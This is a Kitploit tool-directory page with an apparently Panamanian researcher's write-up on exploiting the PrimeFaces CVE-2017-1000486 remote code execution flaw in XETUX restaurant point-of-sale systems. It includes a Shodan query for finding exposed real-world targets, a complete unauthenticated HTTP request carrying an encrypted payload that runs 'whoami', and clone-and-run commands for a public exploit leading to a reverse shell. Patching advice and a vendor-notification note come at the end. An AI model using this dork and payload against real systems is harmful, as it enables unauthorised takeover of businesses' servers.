Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
primefaces — Explotación CVE-2017-1000486 | Kitploit
Tools/GitHubGitHub/jam620/primefaces
ReconnaissanceVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubjam620/primefaces

primefaces

Explotación CVE-2017-1000486

View Repository
32 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

From the Table to the Code: A Journey Through the RCE Vulnerability in POS for Restaurants

This time we accidentally came across a vulnerability present in several POS applications for restaurants XETUX, which is a solution for restaurant monitoring and automation. In Panama, it is a widely used tool by many restaurants.

The present vulnerability is an RCE (remote code execution), which allows attackers to execute code without authentication and gain privileges on the target.

2

1. Enumeration

Once we discovered the existence of a library present in the Xetux application, the library in question is called Primefaces, responsible for generating PDFs, we decided to perform a search on Shodan to identify potential targets.

root@kitploit:~
http.title:"@XETUX" country:PA

The search returned 40 results and 334 worldwide.

1

We proceed to test the vulnerability on one of the targets that were not in Panama. When analyzing the results, the backend

3

We can see that the application has been installed with all privileges nt authority\system. Let's explain what happens next:

The application is using an Apache Tomcat as the server; for the backend Java is used. The application uses a library or third-party plugin called Primefaces. The problematic route is the endpoint javax.faces.resource/dynamiccontent.properties.xhtml

When searching about this library, we found a vulnerability. Primefaces loads dynamic content in the following way:

root@kitploit:~
/javax.faces.resource/dynamiccontent.properties.jsf?ln=primefaces&pfdrid=dY1NMdRjZ4sqkGAPrRzKkmxm5b1DSrlJ7VXTVU2i7gmrhtVAkmH7aR8cUk7h%2BTgl&forcereload=1523006610695&pfdrid_c=true

The problem lies in the pfdrid parameter.

pfdrid=dY1NMdRjZ4sqkGAPrRzKkmxm5b1DSrlJ7VXTVU2i7gmrhtVAkmH7aR8cUk7h%2BTgl

The parameter value is encrypted and there is no way to verify if the request will be decrypted correctly. Unfortunately, if the default key values are not modified, one can request the generation of a default key, so fortunately for us, all tests performed kept the default key.

Similarly, a Padding Oracle Attack could be performed to obtain the key using the Padbuster tool. Below we share the request:

root@kitploit:~
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: ip:9090
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 1643

pfdrt=sc&ln=primefaces&pfdrid=4xE5s8AClZxUxmyaZjpBstMXUalIgOJHOtvxel%2Fv4YXvibdOn52ow4M6lDaKd9Gb8JdQqbACZNWVZpVS%2B3sX1Hoizouty1mYYT4yJsKPnUZ0LUHDvN0GB5YLgX1PkNY%2B1ZQ%2FnOSg5J1LDyzAjBheAxLDODIVcHkmJ6hnJsQ0YQ8bMU5%2B%2BTqeD4BGqCZMDjP%2BZQvveiUhxsUC%2F%2BtPqnOgFSBV8TBjDSPNmVoQ9YcKTGelKuJjS2kCXHjcyz7PcQksSW6UUmKu9RhJ%2Bx3Mnx6j56eroVPWnM2vdYRt5An6cLo1YPXu9uqriyg1wgm%2F7xYP%2FUwP1q8wfVeyM4fOw2xJzP6i1q4VLHLXi0VYHAIgaPrZ8gH8XH4X2Kq6ewyrJ62QxBF5dtE3tvLAL5tpGxqek5VW%2BhZFe9ePu0n5tLxWmqgqni8bKGbGrGu4IhXhCJhBxyelLQzPGLCfqmiQwYX5Ime9EHj1k5eoWQzH8jb3kQfFJ0exVprGCfXKGfHyfKfLEOd86anNsiQeNavNL7cDKV0yMbz52n6WLQrCAyzulE8kBCZPNGIUJh24npbeaHTaCjHRDtI7aIPHAIhuMWn7Ef5TU9DcXjdJvZqrItJoCDrtxMFfDhb0hpNQ2ise%2BbYIYzUDkUtdRV%2BjCGNI9kbPG5QPhAqp%2FJBhQ%2BXsqIhsu4LfkGbt51STsbVQZvoNaNyukOBL5IDTfNY6wS5bPSOKGuFjsQq0Xoadx1t3fc1YA9pm%2FEWgyR5DdKtmmxG93QqNhZf2RlPRJ5Z3jQAtdxw%2BxBgj6mLY2bEJUZn4R75UWnvLO6JM918jHdfPZELAxOCrzk5MNuoNxsWreDM7e2GX2iTUpfzNILoGaBY5wDnRw46ATxhx6Q%2FEba5MU7vNX1VtGFfHd2cDM5cpSGOlmOMl8qzxYk1R%2BA2eBUMEl8tFa55uwr19mW9VvWatD8orEb1RmByeIFyUeq6xLszczsB5Sy85Y1KPNvjmbTKu0LryGUc3U8VQ7AudToBsIo9ofMUJAwELNASNfLV0fZvUWi0GjoonpBq5jqSrRHuERB1%2BDW2kR6XmnuDdZMt9xdd1BGi1AM3As0KwSetNq6Ezm2fnjpW877buqsB%2BczxMtn6Yt6l88NRYaMHrwuY7s4IMNEBEazc0IBUNF30PH%2B3eIqRZdkimo980HBzVW4SXHnCMST65%2FTaIcy6%2FOXQqNjpMh7DDEQIvDjnMYMyBILCOCSDS4T3JQzgc%2BVhgT97imje%2FKWibF70yMQesNzOCEkaZbKoHz498sqKIDRIHiVEhTZlwdP29sUwt1uqNEV%2F35yQ%2BO8DLt0b%2BjqBECHJzI1IhGvSUWJW37TAgUEnJWpjI9R1hT88614GsVDG0UYv0u8YyS0chh0RryV3BXotoSkSkVGShIT4h0s51Qjswp0luewLtNuVyC5FvHvWiHLzbAArNnmM7k%2FGdCn3jLe9PeJp7yqDzzBBMN9kymtJdlm7c5XnlOv%2BP7wIJbP0i4%2BQF%2BPXw5ePKwSwQ9v8rTQ%3D%3D&cmd=whoami
2. Reverse Shell

As we mentioned earlier, the library that contains the RCE is Primefaces, which has a public exploit CVE-2017-1000486

We will test the vulnerability by downloading the exploit:

root@kitploit:~
git clone https://github.com/pimps/CVE-2017-1000486.git
cd CVE-2017-1000486
pip3 install -r requirements.txt

We run the exploit:

4

It will return a key and the request:

5

It returns the command result:

6

Now we will proceed to obtain the reverse shell to gain access to the server:

7

3. Final Considerations
  • It is important to note that the flaw does not only apply to Xetux software; it is in the Primefaces library and is also found in other applications such as MaxView Storage Manager and DOCBOX.
  • Fixes for the vulnerability have been available for years, as it dates back to 2017. It is recommended to update Primefaces.
  • Access to the endpoint is without authentication, so anyone can make requests. Therefore, it is necessary to validate whether the requests are legitimate.
  • If you use any of the mentioned applications, we share the nuclei repository with which you can check if you are vulnerable: https://gitlab.com/t0adsec/nuclei-templates
  • Responsibly, we have informed the application vendors in their respective countries; however, as of today, we have not received any contact from them.
4. References
  • XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行漏洞-CSDN博客. (n.d.). https://blog.csdn.net/holyxp/article/details/134402720
  • Gobysec. (n.d.). GobyVuls/GobyVuls-Document.md at master · gobysec/GobyVuls. GitHub. https://github.com/gobysec/GobyVuls/blob/master/GobyVuls-Document.md
  • Lindner, S. (2018, April 26). PrimeFaces Expression Language Remote Code Execution fix. illucIT Software GmbH. https://www.illucit.com/en/java-ee/primefaces-expression-language-remote-code-execution-fix
Download Tool